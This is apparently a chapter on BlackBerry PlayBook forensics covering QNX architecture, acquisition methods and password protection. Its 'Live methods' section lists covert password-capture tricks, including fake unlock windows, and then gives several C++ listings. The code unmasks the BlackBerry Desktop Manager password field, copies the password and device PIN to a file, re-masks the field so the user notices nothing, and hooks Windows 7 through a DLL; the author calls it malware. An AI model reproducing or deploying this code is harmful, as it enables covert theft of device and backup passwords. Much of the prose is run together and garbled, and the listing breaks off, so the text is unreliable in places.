Don’t Be Mocked Secure Your System1 / 108

Chapter 1

BlackBerry Playbook – New Challenges

Say your client is charged with trade secret theft. What if you could show electronic evidence that, at the time of the theft,your client was in thousand miles away from the crime scene? Or driving down the freeway, talking on his mobile phone?Or sending mundane text messages to his spouse? Or taking photos at the beach? If this sounds appealing, you need tolearn about mobile device forensics.

What you will learn. . .

• What’s new on BlackBerry Playbook Forensics area

• How many differences are between BlackBerry Smartphone and Tablet forensics techniques

What you should know. . .

• Basic knowledge about Forensics (Classic and Live)

• Basic knowledge about BlackBerry Forensics

• Basic knowledge about BlackBerry PlayBook

Mobile phone proliferation in our societies is on the increase. Advances in semiconductor technologies related to mobile phonesand the increase of computing power of mobile phones led to an increase of functionality of mobile phones while keeping thesize of such devices small enough to fit in a pocket. This led mobile phones to become portable data carriers. This in turnincreased the potential for data stored on mobile phone handsets to be used as evidence in civil or criminal cases. Mobiledevices – cell phones, BlackBerrys, Androids, iPads – are everywhere. People use them to take photographs, send texts andemails, update Facebook, consult maps, search the web – the list goes on. As they do this, however, their mobile devicesoften are quietly making records and generating evidence of those activities. For better or for worse, this makes mobile devicesperhaps the richest source of evidence about the people that use them. At present, the BlackBerry holds the palm of insufficientsecurity examination despite of existing approaches more than Android (because Android/iOS/Windows was not developed inconsideration of secure even) but all security techniques implemented in these mobile devices are indecisive argument on security.It means its argument to forensics. All security agencies are facing with dealing with mobiles forensics repeatedly. Forensicstools may give incredible opportunity to gain all kind of data but there are too many slight objections. Until companies go in onlyone of ways - classic forensics or live monitoring (DLP or else) - it fails, because forensics field need more effective synthesis ofmechanism.ed to highlight whether one techniques provide more easy implementation, investigation and handling or not, whatcommon differences examiners may encounter and what they should as concept be involved to forensic handling with theseplatforms because a Playbook OS is completely a new approach.

Don’t Be Mocked Secure Your System2 / 108

Mobile Forensics

As mobile phones become so ubiquitous and play such large societal role there is a high probability that these same devices willbe part of those investigations. A mobile phone can be tied to crime in four ways:

• as a communication tool in the process of committing a crime.

• as a storage device providing evidence of a crime.

• as a storage device that contains victim information.

• It can be a means of committing a crime

Mobile devices can communicate constantly, a very real concern exists that the data you are interested in (especially email, texts,and internet records) could be crowded out by newly arriving data and disappear if the device is not rendered incommunicative.This could be as simple as turning the device off, but you should be aware the loss of data in RAM memory or activation ofpassword protections. The same effect could happen if the device’s batteries run out.

Nowadays mobile devices provide amount of features to integrate all possible communications following aggregation with dataon BlackBerry as well as Android. The native and third party applications often connect to the email, maps IM messengerand social statutes. They keep users connected and do far more. The logical acquisition manages with known data typesfor any user and this data set rarely differs among of iOS, Android or BlackBerry. As mentioned above these data containmessages (SMS/MMS/Email/IM), social network data, contacts, calendar, phone logs, password and bank wallet and otherfinancial application data, media data (Audio/Photos/Videos) and other data even file structure, browser data (web history asa timeline and bookmarks), and shared folders. The BlackBerry apps environment is known is wide-bind and amazing thanAndroid. On another hand, Android has enough not only third-party applications that is very different but also a hundredsvariations depend on manufacturer. As opposed to the BlackBerry Smartphone, the BlackBerry PlayBook is on QNX OS offersimplemented modern technologies take away from real development. All above brings in the zoo-world of mobile phones andhighlights issues of misusing security techniques in development area. New special skills that forensics experts required rarelybased on experience only.

Each year the classic forensics techniques face on a huge problem while live forensics (or live monitoring) gives new opportunitiesto manipulate with data. Sometimes, company IT Policy or OS vision may be helpful to be sure that no triggers will breakinvestigation. Physical approach is trust but nonoperability, while logical is more dangerous because of synchronization processvia network, cellular, and OTA. There are too many cases when it cannot afford not to use prevent methods or tools to simplifythe classic forensics. This article describes technical problems encountered by forensics as well as different live solutions maybeuseful and those became "right" way with vendors’ development.

Playbook Architecture

We have already known that QNX-based OS is background for BlackBerry 10 (that replaces old BlackBerry OS after version 7)and BlackBerry Tablet. BlackBerry Tablet OS based on the QNX Neutrino real-time OS featured by running Adobe AIR andWebWorks applications as well as Android applications written in Java instead of BlackBerry Java applications (smartphonesapps). Below are main features that available on the Playbook

• BlackBerry Bridge – the ability to connect to, and access data on, a BlackBerry smartphone using internet.

– Document editing through BlackBerry Bridge

– BlackBerry Messenger, Push email, contacts, calendar, etc. via BlackBerry Bridge

• Video chat capability with other BlackBerry PlayBook users

• Adobe Flash and Adobe AIR

• ZIP Attachment Support

• Application created using NDK

Don’t Be Mocked Secure Your System3 / 108

• Support for Android 2.3 apps

• Documents To Go and Print To Go

• Native Email, Calendar, Contacts app

• File Manager

• Social network integration with Facebook, Twitter, LinkedIn

• Full device encryption

• Screenshots saved in lossless PNG format.

Figure 1.1: BlackBerry Playbook

The BlackBerry Tablet OS is a microkernel OS implements the minimum amount of software in the kernel space and run otherprocesses in the user space outside of the kernel space. By running most processes in the user space, the BlackBerry TabletOS can manage unresponsive processes in isolation from others. This helps prevent damage to the operating system and otherapplications.

The primary goal of QNX Neutrino is to deliver the open systems POSIX API in a scalable form suitable for a wide range ofsystems—from tiny, resource-constrained embedded systems to high-end distributed computing environments that is fundamentalfor mission-critical applications. QNX Neutrino is ideal for embedded real-time applications. It can be scaled to very smallsizes and provides multitasking, threads, priority-driven scheduling, and fast context-switching—all essential ingredients of anembedded real-time system. Any thread on any machine in the network can directly make use of any resource on any othermachine. From the application’s perspective, there is no difference between a local or remote resource—no special facilitiesneed to be built into applications to allow them to make use of remote resources. Users may access files anywhere on thenetwork, take advantage of any peripheral device, and run applications on any machine on the network (provided they have theappropriate authority). Processes can communicate in the same manner anywhere throughout the entire network. Thus, the QNXNeutrino microkernel has kernel calls to support the following:

Don’t Be Mocked Secure Your System4 / 108

• threads

• message passing

• signals

• clocks

• timers

• interrupt handlers

• semaphores

• mutexes

• condition variables

• barriers

The key advantage gained by adding memory protection to embedded applications, especially for mission-critical systems, isimproved robustness. With memory protection, if one of the processes executing in a multitasking environment attempts toaccess memory that hasn’t been explicitly declared or allocated for the type of access attempted, the MMU hardware can notifythe OS, which can then abort the thread (at the failing/offending instruction). This protects process address spaces from eachother, preventing coding errors in a thread in one process from damaging memory used by threads in other processes or even inthe OS. During development, common coding errors (e.g. stray pointers and indexing beyond array bounds) can result in oneprocess/thread accidentally overwriting the data space of another process. If the overwriting touches memory that isn’t referencedagain until much later, you can spend hours of debugging—often using in-circuit emulators and logic analysers—in an attemptto find the guilty party.

The microkernel architecture of the BlackBerry Tablet OS supports the following features:

• designed to be tamper resistant means if the kernel integrity test reveals damage to the kernel, the BlackBerry Tablet OS doesnot start.

• designed to be resilient means restarting any process without negatively affecting others because of separation user and kernelspace.

• designed to be highly secure throughout validation requests for system resources like access to the camera via displaying adialog box to grant or refuse access to that capability.

• designed to verify the authenticity of an application means to be signed by the RIM Signing Authority with developer certificate.

Going further to details and uncover QNX architecture.

File systems

QNX Neutrino provides a rich variety of file systems. Like most service-providing processes in the OS, these file systems executeoutside the kernel; applications use them by communicating via messages via POSIX API open() , close() , read() , write() , lseek(), etc. and checking for permissions and access authorizations. When a pathname is resolved, the process manager contacts allthe file-system resource managers that can handle some component of that path. The result is a collection of file descriptors thatcan resolve the pathname. If the pathname represents a directory, the process manager asks all the file systems that can resolvethe pathname for a listing of files in that directory when readdir() is called else resolves the pathname is accessed.

File systems categorized into the following classes:

• Block that operates on block devices like hard disks and CD-ROM drives

• Network that provides network file access to the file systems on remote host computers.

Don’t Be Mocked Secure Your System5 / 108

Every QNX system also provides a simple RAM-based file system that allows read/write files to be placed under /dev/shmem thatis not actually a file system and used in tiny embedded systems where persistent storage across reboots is not required, yet wherea small, fast, temporary-storage file system with limited features is called for. The RAM file system does not support hard orsoft links or directories but possible to create a link to it by using process-manager links, e.g. create a link to a RAM-based /tmpdirectory: ln -sP /dev/shmem /tmp following "procnto" to create a process manager link to /dev/shmem known as /tmp.According to minimizing the size of the RAM file system code inside the process manager, this file system does not include filelocking or directory creation features.

The Network File System (NFS) allows a client workstation to perform transparent file access over a network, operate on serverfiles across a variety of OS. NFS operates by using remote procedure calls (RPC) and TCP/IP for its transport.

All these implementations means that:

• file systems may be started and stopped dynamically.

• multiple file systems may run concurrently.

• applications are presented with a single unified pathname space and interface, regardless of the configuration and number ofunderlying file systems.

• a file system running on one node is transparently accessible from any other node.

Networking Architecture

The networking services execute outside the kernel too and allow:

• network drivers to be started and stopped dynamically

• protocols to run together in any combination

The network subsystem relies on network manager (io-pkt-v4, io-pkt-v4-hc, or io-pkt-v6-hc). On bottom are drivers providedthe passing data to and receiving data from the hardware. The drivers hook into a multi-threaded layer-2 component (thatalso provides fast forwarding and bridging capability) that ties them together and provides a unified interface for directingpackets into the protocol-processing components of the stack. This includes, for example, handling individual IP and upper-layerprotocols such as TCP and UDP. The resource manager is on top of the stack and looks like inter-level between the stack and userapplications where developers find a well-known interface i.e. open(), read(), write(), and ioctl(). A detailed view of the io-pktarchitecture is on picture 2.

Don’t Be Mocked Secure Your System6 / 108

Figure 1.2: Network architecture

At the driver layer, there are interfaces for Ethernet traffic and for 802.11 management frames from wireless drivers. Here ishardware crypto API that allows the stack to use a crypto offload engine when it’s encrypting or decrypting data for secure links.In addition to drivers and protocols, the stack also includes hooks for packet filtering:

• Berkeley Packet Filter (BPF) interface. A socket-level interface that lets you read and write, but not modify or block, packets,and that you access by using a socket interface at the application layer (see http://en.wikipedia.org/wiki/Berkeley_Packet_Filter).This is the interface of choice for basic, raw packet interception and transmission and gives applications outside of the stackprocess domain access to raw data streams.

• Packet Filter (PF) interface. A read/write/modify/block interface that gives complete control over which packets are receivedby or transmitted from the upper layers and is more closely related to the io-net filter API

IP used for everything from simple tasks e.g. remote login to more complicated tasks e.g. delivering real-time stock quotes.QNX provides the following stack configurations:

• NetBSD TCP/IP stack supports forwarding, broadcast and multicast, hardware checksum support, routing sockets, Unix do-main sockets, multilink PPP, PPPoE, supernetting (CIDR), NAT/IP filtering, ARP, ICMP, and IGMP, as well as CIFS, DHCP,AutoIP, DNS, NFS (v2 and v3 server/client), NTP, RIP, RIPv2, and an embedded web server

• Enhanced NetBSD stack with IPsec and IPv6 includes previous but targeted at the new generation of mobile and securecommunications - IPv6 and IPsec mainly for VPNs over IPsec tunnels

IKE (ISAKMP/Oakley) key management protocol for establishing secure host associations.

The BSD Socket API was the obvious choice for QNX Neutrino that is a standard API for in the UNIX world like Winsock APIin Windows. All the routines that application programmers including well known: accept(), bind(), bindresvport(), connect(),dn_comp(), dn_expand(), endprotoent(), endservent(), gethostbyaddr(), gethostbyname(), getpeername(), getprotobyname(),getprotobynumber(), getprotoent(), getservbyname(), getservent(), getsockname(), getsockopt(), herror(), hstrerror(), htonl(),htons(), h_errlist(), h_errno(), h_nerr(), inet_addr(), inet_aton(), inet_lnaof(), inet_makeaddr(), inet_netof(), inet_network(),inet_ntoa(), ioctl(), listen(), ntohl(), ntohs(), recv(), recvfrom(), res_init(), res_mkquery(), res_query(), res_querydomain(),res_search(), res_send(), select(), send(), sendto(), setprotoent(), setservent(), setsockopt(), shutdown(), socket().

BlackBerry Playbook provides a NAT that includes such features as:

Don’t Be Mocked Secure Your System7 / 108

• rule grouping: to apply different groups of rules to different packets

• stateful filtering: an optional configuration to allow packets related to an already authorized connection to bypass the filterrules

• NAT—for mapping several internal addresses into a public (Internet) address, allowing several internal systems to share asingle Internet IP address.

• proxy services: to allow ftp, NetBIOS, and H.323 to use NAT

• port redirection: for redirecting incoming traffic to an internal server or to a pool of servers.

User Interface

The presence of the Shared Task Model and its use as a communication medium between the user and the Tablet recognitionsystem affords the potential to create a wide variety of different user interfaces, each customized for different usage environmentsand manipulation capabilities.

Playbook benefits are in it designed to provide the flexibility that comes from providing an intelligent supervisor and intelli-gent subordinates the ability to collaborate flexibly about the precise task and method that the subordinate is to perform. Thisinteraction style will provide multiple benefits for the human and machine collaboration, including:

• Increased user satisfaction and acceptance

• Decreased human skill loss

• More balanced workload

• More accurate and balanced automation reliance decisions

• Increased situation awareness (relative to a more fully automated or autonomously adaptive automation approach)

• Improved human and machine system performance (especially in flexible and unpredictable domains which offer enough timefor human awareness and planning)

Forensics techniques

There are many different ways to analyze forensically a mobile device:

• Physical acquisition technique is a bit-by-bit copy of an entire physical stories, doing a full physical copy (i.e., all the bitsin memory, not just the files) of the entire memory store on the device. This method, which can be very difficult to performproperly, allows deleted files and any data remnants present (i.e., in unallocated memory or file system space) to be examined,which otherwise would go unfound

• Logical acquisition technique is a bit-by-bit copy of logical storage objects (e.g., directories and files). It has the advantage ofsimplifying for a tool to extract and organize but does not produce any deleted information except database file cases whichdoes not overwrite the information but simply marks it as deleted and available for later overwriting.

• Using commercially available forensic software tools (as extend previous) which, as time passes, are becoming increasinglymore capable and sophisticated. This software generally makes a full copy of all the files on the device (i.e., a "logical" copy),which can result in a capture of most user-created data, and even some deleted data.

• Manual acquisition technique is user interface utilizing to get pictures of data from the screen, simply manipulating the phone(by navigating through the email, photographs, or contacts list, for example) while videotaping and/or photographing theresults. While this may be sufficient for some cases, obvious disadvantages include the fact that it involves manipulating andchanging the very evidence you are seeking to preserve. The disadvantage is that only data visible to the operating system canbe recovered and that all data are only available in form of pictures.

• Backup - This technique is relatively easy, and it allows a significant amount of user-created data (photographs, songs, andemails, texts) to be preserved. Care must be taken, however, to modify the settings so that data from the "synced" computer doesnot overwrite the data on the device. Like previous, it also involves some manipulation, and thus alteration, of the evidence.

Don’t Be Mocked Secure Your System8 / 108

BlackBerry Playbook Challenges

A BlackBerry is a handheld mobile device engineered for email. All models now come with a built-in mobile phone, makingthe BlackBerry an obvious choice for users with the need to access their email from somewhere besides the comfort of a deskchair. The BlackBerry device is always on and participating in some form of wireless push technology. Because of this, theBlackBerry does not require some form of desktop synchronization like the other mobile device does. BlackBerry Playbook isan add-on for BlackBerry smartphone only, because BlackBerry Bridge accesses mail, calendaring and contacts directly from atethered BlackBerry phone, the PlayBook meets the same encryption standards as the BlackBerry phone. It is the first (and asof September 2011, the only) tablet device to receive FIPS 140-2 certification, which makes it eligible for use by U.S. federalgovernment agencies. In addition, the Australian government also approved the use of PlayBook as the only tablet that meetsits security standard. Playbook does not have neither push technology for email/calendar/else, only IMAP4 and POP3 exceptMS Exchange link nor BIS except BlackBerry Mobile Fusion that did not replace BES but one more add-on to manage non-blackberry smartphone devices and BES existed in company. In addition, email and social accounts will broke and ask youreenter your password that may help to discard pushing data.

Figure 1.3: Broken Mail

Network Isolation

One of the main ongoing considerations for analysts is preventing the device from any network changes that is sometimesachievable for PlayBook where there is no cellular connection, but only a network connection. As mentioned early it might bringin new data. However, any interaction with the devices like plugging and unplugging the device will modify them. The firstidea is dismounting encryption or preventing of blocking to examine the device while it is running. PlayBook as another elsedevice is difficult to analyze forensically without negative affecting because of storage cannot be easily removed, storage is onlyinternal and there no external storage like SD-card as it is for BlackBerry smartphone. The worst case in forensics is remotewiping initiated or data added/overwritten outside control from any triggers often SMS or incoming call is impossible throughBlackBerry Bridge even: SMS for BlackBerry Bridge simply didn’t developed and incoming call notification cannot be caughtas well as all Bridge’s events throughout API. Nevertheless, forensics experts still have to prevent a connection. A powerful way"airplane mode" (or the same named in different way) helps. Android problem to stop network communications is awful GUIand forensics officer should press and hold the Power off button and select Airplane mode at first (if this hotkey will work) orthen press Menu (from the home screen), Settings, finally, the Wireless option which is generally near the top. It’s only to disablecellular network while to block wireless connection like Bluetooth or Wi-Fi he have to walk out home screen to the settings that

Don’t Be Mocked Secure Your System9 / 108

have upset because time is counting and no one can be sure if setting GUI is the same among devices. BlackBerry allows do itvery quickly by clicking on tray on home screen.

BlackBerry Push-Technology for Playbook

BlackBerry (smartphone) was primary engineered for email and come with a built-in mobile phone providing access to theemail from anywhere. It is always on and participating in wireless push-technology and does not require any kind of desktopsynchronization like the others. The first step is turn the radio off, or a better solution is to take the device to an in area wherethe signal cannot be received, as the BlackBerry device is not really "off" unless power is removed for an extended period. If theblackberry powered back off then any items that were in the queue waiting to be pushed to the device could possibly be pushedbefore you could stop them.

The BlackBerry PlayBook is an add-on for BlackBerry smartphone only, because BlackBerry Bridge accesses mail, calendaringand contacts directly from a tethered BlackBerry phone. Since the Playbook is not all always on there is rarely types of informa-tion pushed to it following overwriting or deletion. The PlayBook does not have neither push technology for email/calendar/else(only IMAP4 and POP3 except MS Exchange link) nor BIS except BlackBerry Mobile Fusion that managed non-blackberrysmartphone devices and BES existed in company. In addition, email and social accounts may broke and ask user reenter hispassword that may help to discard pushing data. It means the PlayBook is not all always on there is rarely types of informationpushed to it following overwriting or deletion. As opposed to smartphone, Playbook was made filled by stand-alone applica-tions that mighty use internet connect in standby mode or when applications swiped down; by default, Playbook has option torestrict activity in this state. The Playbook address book application is filled Facebook, Twitter and LinkedIn connections, butsynchronizing has never happened before you run application and wait until it is done. Sometimes it takes 1 minute even or more.

Password Protection

BlackBerry devices come with password protection and attempt limit (by defaults - five out ten, min - three out ten; a PlayBookcase may differ from five to ten where "ten" is often for PlayBook device and "five" is for BlackBerry Desktop Software andplugged PlayBook). If it is exceed, device will wipe then (factory resetting). All data stored on external memory will keepbecause that’s not part of the factory configuration if talking about smartphone not PlayBook, which has not external storage. Soit will not reformat the micro SD card but if you have a BlackBerry Playbook, you will get factory defaults at all.

Password Extraction/Bypassing

Brute-force

Accessing encrypted information stored in password-protected backups it possible via Elcomsoft products that offer to restorethe original password of backup and device. The toolkit allows eligible customers acquiring bit-to-bit images of devices’ filesystems, extracting phone secrets (passcodes, passwords, and encryption keys) and decrypting the file system dump. It also readsBlackBerry Wallet data and Password Keeper data. The recovery of BlackBerry password is possible only if the user-selectableDevice Password security option enabled to encrypt media card data. As the Playbook poor for native application, you could finddatabases with password in shared folders put by third-party applications.

Live methods

Techniques discussed in my articles (mainly summarized in "To get round to the heart of fortress", "When Developer’s APISimplify User-Mode Rootkits Developing", "When Developers API Simplify User-Mode Rootkits Development - Part II") arestill effective and very useful. These techniques are:

• default feature to show password without asterisks that’s a possible to screen-capture. If "screenshot" API isn’t disable it works(by defaults it’s allowed)

Don’t Be Mocked Secure Your System10 / 108

• scaled preview for typed character through virtual keyboard. It works too and maybe screenshoted. As further considerationagent may XOR two screenshots and extract preview of pressed key as well as typed text.

• stealing password during synchronization from BlackBerry Desktop Software. It works because of security issues of WindowsAPI. Moreover, it works not only to grab device password but backup password too.

• redrawing fake-window to catch typed password on device. Some social engineering aspect to announce "something is crashedand lock the device, please unlock by re-entering a password". The last techniques (stealing) work on PlayBook as well.

I will remind how to extract password from BlackBerry Desktop Software in real-time. Every device is going to synchronizewith PC sometimes. Pass over a Mac and move to Windows. Windows XP and Windows Vista (just in case), Windows 7 makeour first target group (most popular). BlackBerry Device Manager (as known in version 4.xx or 5.xx) and BlackBerry DesktopManager make second target group (if we are talking about version 6.xx). It is a minor target than major target is password fieldof textbox’s software. Unfortunately, we cannot get a screen-capture. So, try to use a WINAPI functional.

First, we need recall a knowledge about system messages and system object. What does edit box look like? It’s simple fieldfor typing character ~32k in length that has a "password char" property. It has default #0 value or NULL or \0’. Other maskingcharacter could be a black circle, asterisk, or anything else. 0x25CF is Unicode character of black circle. Every system objectlike modal window or textbox responds to API subroutine such as "SendMessage" or "PostMessage". Both subroutines send thespecified message to a window or windows. However, if you need to post a message in the message queue associated with athread you should use the "PostMessage" function. Parameters’ syntax is the same. First parameter is (Type: HWND) a handleto the window whose window procedure will receive the message. If this parameter is HWND_BROADCAST ((HWND)0xffff),the message is sent to all top-level windows in the system, including disabled or invisible windows, overlapped windows, andpop-up windows; but the message is not sent to child windows. Second parameter is (Type: UINT) a message to be sent. For listsof the system-provided messages, see System-Defined Messages. Other two parameters (Type: WPARAM, Type: LPARAM) arerepresent an additional message-specific information. It is easy to guess that we need in WM_GETTEXT (0x000D) message. Itcopies the text that corresponds to a window into a buffer provided by the caller. Window’s caption or "text field’s" content couldcopy with it. However, if "edit box" is masked you cannot copy text, because you get a NULL-pointer. Well then, do unmaskcopy and mask again (Figure 7).

Back in 2003 when MS Windows "PostMessage" API Unmasked Password Weakness was found. Declared affects:

• Microsoft Windows 2000 Advanced Server

• Microsoft Windows 2000 Datacenter Server

• Microsoft Windows 2000 Professional

• Microsoft Windows 2000 Server

• Microsoft Windows XP Home Edition

• Microsoft Windows XP Professional

A weakness has been reported in the Microsoft Windows "PostMessage" API, which could effectively allow unmasked passwordsto be copied into a user’s clipboard or other buffer. "PostMessage" places a message in the message queue but does not sufficientlycheck the message type. EM_SETPASSWORDCHAR (Type UINT, Message) messages set the password mask character inpassword edit box controls. "PostMessage" abused in combination with EM_SETPASSWORDCHAR messages to cause anunmasked password placed into a buffer that could be accessed potentially through other means by an unauthorized process.Exploitation would require a malicious local process to wait for an authentication prompt sent to the local user by anotherapplication. The attacker would then have to authenticate normally. The unmasked password will copy while this is occurring.

From this point, a further attack would be required to steal password credentials. Before, use this WINAPI function you shouldknow handler of recipient object. Should to find a window’s handler a then an object’s handler. To do it either downloaddesirable software or other use "WindowFromPoint(Mouse→CursorPos)" that return a handler of what under your mouse cursor’scoordinates. I would prefer a first way.

At first, let us check it with old BlackBerry Manager (version 4 or 5).

Don’t Be Mocked Secure Your System11 / 108

Figure 1.4: Class name & Window Text of controls (v4-v5) - part I

Figure 1.5: Class name & Window Text of controls (v4-v5) - part II

Don’t Be Mocked Secure Your System12 / 108

Figure 1.6: Class name & Window Text of controls (v4-v5) - part III

Figure 1.7: Class name & Window Text of controls (v4-v5) - part IV

Thus, we have a "ClassName" of password’s window "#32770" and language-sensitive caption "Device Password Required".Also, device pin and attempt’s counter are in our disposal.

A "FindWindow" function retrieves a handle to the top-level window whose class name and window name match the specifiedstrings. Its return us a window’s handler. To access to the static and edit controls use the function searches child windows,

Don’t Be Mocked Secure Your System13 / 108

beginning with the one following the specified child window. It is known as "FindWindowEx". Full usage description you findon MSDN (see the Listing 1).

Listing 1. Catch password dialog’s handler (first part)

void __fastcall Catcher(){

//ClassName of Windowchar *internal = "#32770";//Caption of Windowchar *external = "Device Password Required";//Catch a WindowHWND window = FindWindow(internal, external);...

}

But we don’t know what text we’re got in cause having 2 or 3 static name (depend on v4-v5 and v6). Z-order and "GetWindow"function is come to aid. The z-order of a window indicates the window’s position in a stack of overlapping windows. Thiswindow stack is oriented along an imaginary axis, the z-axis, extending outward from the screen. The window at the top ofthe z-order overlaps all other windows. The window at the bottom of the z-order is overlapped by all other windows. Functionretrieves a handle to a window that has the specified relationship (Z-Order or owner) to the specified window. Two parametersshould be used is in "GetWindow" Constant. Note that in BlackBerry Manager v4 (or v5) is one static for password’s attemptsand device pin than in BlackBerry Desktop Manager v6 where it two separate controls (see the Listing 2).

GetWindow Constant

• GW_HWNDNEXT (0x0002) Identifies the window below the specified window in the Z order.

• GW_HWNDPREV (0x0003) Identifies the window above the specified window in the Z order.

Listing 2. Retrieve a static text from password dialog (second part)

void __fastcall Catcher(){

...if ((bool)(int)window){

//Label like "Password:"char *stat_pass_text = (char *)malloc(256);//Label like "PIN of Device:"char *stat_devc_text = (char *)malloc(256);//Label like "Your attempt counts:"char *stat_attmp_text = (char *)malloc(256);

//In Z-order first of all get a password-static controlHWND stat_pass = FindWindowEx(window, NULL, "Static", "Password:");//In Z-order previous of it is attemp’s countHWND stat_attmp = GetWindow(stat_pass, 3);//In Z-order next of it is Device PINHWND stat_devc = GetWindow(stat_pass, 2);

//get control’s caption for a password-static controlGetWindowText(stat_pass, stat_pass_text, 256);//get control’s caption for a pin-static controlGetWindowText(stat_attmp, stat_attmp_text, 256);//get control’s caption for a attemp_count-static controlGetWindowText(stat_devc, stat_devc_text, 256);

AnsiString DEV_PIN = AnsiString(stat_devc_text);AnsiString ATTEMPT = AnsiString(stat_attmp_text);

Don’t Be Mocked Secure Your System14 / 108

//correct a program version://if NULL then BlackBerry Manager v4 or BlackBerry Manager v5//else everythin ’s OK - BlackBerry Desktop Manager v6if (DEV_PIN.Length() < 1){

int pos = AnsiPos("\n", AnsiString(ATTEMPT.c_str()));//extract a first part of Static (PIN)DEV_PIN = ATTEMPT.SubString(1, pos - 1);//extract a second part of Static (attempt’ count)AnsiString ATTEMPT = ATTEMPT.SubString(pos + 1, ATTEMPT.Length() - ←↩

pos);}

free(stat_devc_text);free(stat_attmp_text);free(stat_pass_text);...

}...

}

After it copied, get an edit’s handler and send via "PostMessage" function with EM_SETPASSWORDCHAR message andNULL-parameters (WPARAM & LPARAM) to that handler. Via "SendMessage" function with WM_GETTEXT and buffer &buffer-size parameters retrieved characters from edit-box. Moreover, do not forget about masking typed chars via "SendMes-sageW" functional with EM_SETPASSWORDCHAR message and 0x25cf WPARAM. It strongly recommend using Unicodeversion of "SendMessage", else you’ve got another character than black circle (see the Listing 3).

Listing 3. Catch password from a password dialog (third part)

void __fastcall Catcher(){

...if ((bool)(int)window){

...Application->ProcessMessages();//get handler of EditBoxHWND pass_hwnd = FindWindowEx(window, NULL, "Edit", NULL);//Check desirable EditBox (with Parent Form’s Caption "Device Password ←↩

Requied")if ((bool)(int)pass_hwnd){

//unset password maskingPostMessage(pass_hwnd, EM_SETPASSWORDCHAR, 0, 0);//ReDraw EditBox//InvalidateRect(pass_hwnd, 0, true);

//allocate memory for edit’s passwordchar *passw = (char *)malloc(256);

//Password’s borrowingSendMessage(pass_hwnd, WM_GETTEXT, (WPARAM)256, (LPARAM)passw);

//store in new variableAnsiString password = AnsiString(passw);free(passw);

//Don’t let him (user) see it. Paint out.//0x25CF is unicode character of black circle

//(dialog boxes on Win7, XP).SendMessageW(pass_hwnd, EM_SETPASSWORDCHAR, 0x25cf, 0);

Don’t Be Mocked Secure Your System15 / 108

//ReDraw EditBox//InvalidateRect(pass_hwnd, 0, true);

//If action is unsuccessfull set "EMPTY" infoif (password.Length() == 0){

password = "EMPTY";}if (DEV_PIN.Length() == 0){

DEV_PIN = "EMPTY";}if (ATTEMPT.Length() == 0){

ATTEMPT = "EMPTY";}

//Store in StringList variable our PIN, attemps count and passin_list->Add(DEV_PIN);in_list->Add(ATTEMPT);in_list->Add(password );

Application->ProcessMessages();try{

in_list->SaveToFile("c:\\pass.txt");}catch (Exception *ex){

}}

}}

Look at figures 8. A malware’s code has caught a password, device pin, attempt counter. To prove password’s correctness Icomment "SendMessageW(..,0x25cf,..)" line to represent a password without masking (figure 9).

Figure 1.8: Stolen password (v4)- part I

Don’t Be Mocked Secure Your System16 / 108

Figure 1.9: Stolen password (v4)- part II

If we try to use this code in Vista or Seven we get nothing, because it is more correct to set system hook is owner address spacevia loading a DLL-Cather. However, at this rate you should to know OS version, right? Roughly, we need a so-called MajorVersion to distinct XP and 7 (see the Listing 4).

Listing 4. Get OS version

bool xp_seven = false; //indicate XP OS or Seven OSvoid __fastcall get_os(){

vinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);GetVersionEx(&vinfo);if (vinfo.dwMajorVersion == 4){

this->Edit5->Text = "Windows NT 4.0, Windows Me, Windows 98, or Windows 95" ←↩;

}else if (vinfo.dwMajorVersion == 5){

this->Edit5->Text = "Windows Server 2003 R2, Windows Server 2003, Windows ←↩XP, or Windows 2000";

xp_seven = false;}else if (vinfo.dwMajorVersion == 6){

this->Edit5->Text = "Windows Vista, Windows Server Longhorn or Windows ←↩Seven";

xp_seven = true;}...

}

Now, let us check with class names and window texts against BlackBerry Desktop Manager (figures 10-13). Most of this repeatsprevious parts exclude several ideas. How to use system hooks you can find on google.com, so I mark several ideas. SysMsg-Proc(int code, WPARAM wParam, LPARAM lParam) returns to us parameter (LPARAM) Wnd = ((tagMSG*)lParam)→hwndwhere stored out handler for controls. Then we need to catch again a password dialog and retrieve a edit’s handler. Aftersuccessful comparing both handlers you is able to steal password. Note, in this case (dll) you should redraw a control byinvalidate-function (see the Listing 5-6).

Don’t Be Mocked Secure Your System17 / 108

Figure 1.10: Class name & Window Text of controls (v6) - part I

Figure 1.11: Class name & Window Text of controls (v6) - part II

Don’t Be Mocked Secure Your System18 / 108

Figure 1.12: Class name & Window Text of controls (v6) - part III

Figure 1.13: Class name & Window Text of controls (v6) - part IV

Don’t Be Mocked Secure Your System19 / 108

Listing 5. Main definitions

void __fastcall TForm1::FormCreate(TObject *Sender){

if (FileExists("c:\\pass.txt")){

DeleteFile("c:\\pass.txt");}

//get os versionvinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);GetVersionEx(&vinfo);if (vinfo.dwMajorVersion == 4){

this->Edit5->Text = "Windows NT 4.0, Windows Me, Windows 98, or Windows 95" ←↩;

}else if (vinfo.dwMajorVersion == 5){

this->Edit5->Text = "Windows Server 2003 R2, Windows Server 2003, Windows ←↩XP, or Windows 2000";

xp_seven = false;}else if (vinfo.dwMajorVersion == 6){

this->Edit5->Text = "Windows Vista, Windows Server Longhorn or Windows ←↩Seven";

xp_seven = true;}

if (xp_seven){

// Load the DLL filehModule = LoadLibrary("Catcher.dll");

// Get the address of the functionRunStopHook = (void *(__stdcall *)(bool, HINSTANCE))GetProcAddress(hModule, ←↩

"_RunStopHook");

//Start CatcherRunStopHook(true, hModule);

}else{this->CatchTimer->Enabled = true;

}}//---------------------------------------------------------------------------void __fastcall TForm1::FormDestroy(TObject *Sender){

if (normally_closed){return;}if (xp_seven){

if (RunStopHook != NULL){

RunStopHook(false, hModule);}if (hModule != NULL){

Don’t Be Mocked Secure Your System20 / 108

FreeLibrary(hModule);}

}}//---------------------------------------------------------------------------void __fastcall TForm1::FormClose(TObject *Sender, TCloseAction &Action){

if (xp_seven){

if (RunStopHook != NULL){

RunStopHook(false, hModule);}if (hModule != NULL){

FreeLibrary(hModule);}

}normally_closed = true;

}

Listing 6. DLL Catcher

HHOOK SysHook;HWND Wnd;HINSTANCE hInst;TStringList *in_list = new TStringList();//---------------------------------------------------------------------------int WINAPI DllEntryPoint(HINSTANCE hinst, unsigned long reason, void* lpReserved){

hInst = (HINSTANCE)hinst;return 1;

}//---------------------------------------------------------------------------extern "C" void __export RunStopHook(bool State, HINSTANCE hInstance){

if (true){

